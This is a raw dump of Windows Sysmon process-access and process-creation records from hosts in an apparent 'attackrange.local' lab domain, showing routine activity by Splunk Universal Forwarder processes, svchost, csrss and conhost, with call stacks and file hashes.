22:12:31.488{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+106fe|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000359975Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:31.488{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+108a0|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000359974Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:31.488{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+10225|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000359973Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:31.488{8e433fbf-2a44-6013-0600-000000001100}7565040C:\Windows\system32\csrss.exe{8e433fbf-36cf-6013-9403-000000001100}10196C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\system32\basesrv.DLL+2fba|C:\Windows\SYSTEM32\CSRSRV.dll+5af4|C:\Windows\SYSTEM32\ntdll.dll+6cedf 10341000x8000000000000000359972Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:31.488{8e433fbf-2a45-6013-4f00-000000001100}37406536C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{8e433fbf-36cf-6013-9403-000000001100}10196C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9d934|C:\Windows\System32\KERNELBASE.dll+5f32a|C:\Windows\System32\KERNELBASE.dll+5bcc6|C:\Windows\System32\KERNEL32.DLL+1be93|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+20e72|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 154100x8000000000000000359971Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:31.490{8e433fbf-36cf-6013-9403-000000001100}10196C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{8e433fbf-2a44-6013-e703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{8e433fbf-2a45-6013-4f00-000000001100}3740C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000032712Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:32.835{FF16AF91-36D0-6013-6A03-00000000A401}14125668C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{FF16AF91-26C7-6013-3400-00000000A401}3696C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032711Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:32.694{FF16AF91-26C8-6013-3F00-00000000A401}29803196C:\Windows\system32\conhost.exe{FF16AF91-36D0-6013-6A03-00000000A401}1412C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032710Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:32.694{FF16AF91-26B6-6013-0C00-00000000A401}6121040C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032709Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:32.694{FF16AF91-26B6-6013-0C00-00000000A401}6121040C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032708Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:32.694{FF16AF91-26B6-6013-0C00-00000000A401}6121040C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032707Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:32.694{FF16AF91-26B6-6013-0C00-00000000A401}6121040C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032706Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:32.694{FF16AF91-26B4-6013-0500-00000000A401}6441200C:\Windows\system32\csrss.exe{FF16AF91-36D0-6013-6A03-00000000A401}1412C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000032705Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:32.694{FF16AF91-26C7-6013-3400-00000000A401}36964500C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FF16AF91-36D0-6013-6A03-00000000A401}1412C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000032704Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:32.695{FF16AF91-36D0-6013-6A03-00000000A401}1412C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{FF16AF91-26B5-6013-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{FF16AF91-26C7-6013-3400-00000000A401}3696C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000359997Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:32.957{8e433fbf-36d0-6013-9603-000000001100}1033211148C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{8e433fbf-2a45-6013-4f00-000000001100}3740C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000359996Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:32.801{8e433fbf-2a47-6013-6600-000000001100}53205376C:\Windows\system32\conhost.exe{8e433fbf-36d0-6013-9603-000000001100}10332C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\conhost.exe+1260d|C:\Windows\system32\conhost.exe+12505|C:\Windows\system32\conhost.exe+895c|C:\Windows\system32\conhost.exe+f2e6|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000359995Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:32.801{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+111b6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000359994Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:32.801{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+106fe|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000359993Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:32.801{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+108a0|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000359992Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:32.801{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+10225|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000359991Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:32.801{8e433fbf-2a44-6013-0600-000000001100}7561420C:\Windows\system32\csrss.exe{8e433fbf-36d0-6013-9603-000000001100}10332C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\system32\basesrv.DLL+2fba|C:\Windows\SYSTEM32\CSRSRV.dll+5af4|C:\Windows\SYSTEM32\ntdll.dll+6cedf 10341000x8000000000000000359990Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:32.801{8e433fbf-2a45-6013-4f00-000000001100}37406536C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{8e433fbf-36d0-6013-9603-000000001100}10332C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9d934|C:\Windows\System32\KERNELBASE.dll+5f32a|C:\Windows\System32\KERNELBASE.dll+5bcc6|C:\Windows\System32\KERNEL32.DLL+1be93|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+20e72|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 154100x8000000000000000359989Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:32.804{8e433fbf-36d0-6013-9603-000000001100}10332C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{8e433fbf-2a44-6013-e703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{8e433fbf-2a45-6013-4f00-000000001100}3740C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000032703Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:32.023{FF16AF91-26C8-6013-3F00-00000000A401}29803196C:\Windows\system32\conhost.exe{FF16AF91-36D0-6013-6903-00000000A401}1128C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032702Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:32.023{FF16AF91-26B6-6013-0C00-00000000A401}6121040C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032701Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:32.023{FF16AF91-26B6-6013-0C00-00000000A401}6121040C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032700Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:32.023{FF16AF91-26B6-6013-0C00-00000000A401}6121040C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032699Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 